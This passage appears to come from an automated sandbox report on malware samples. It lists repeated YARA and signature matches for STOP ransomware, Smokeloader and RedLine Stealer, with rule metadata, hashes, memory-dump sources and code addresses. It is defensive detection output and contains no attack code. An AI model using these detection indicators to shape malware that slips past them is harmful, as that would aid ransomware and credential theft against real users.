                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000000E.00000000.490370694.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Temp\7795.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004022E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419416
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041BC3D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E4F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041995A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041064C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004146E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419E9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414F92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041539E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004157BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C117D
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041996A
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00409B50
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00414BCE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004153AE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041BC4D
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00419426
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040E500
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041A5A6
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0041065C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004146F9
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004157CE
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00414FA2
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.0.6246.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
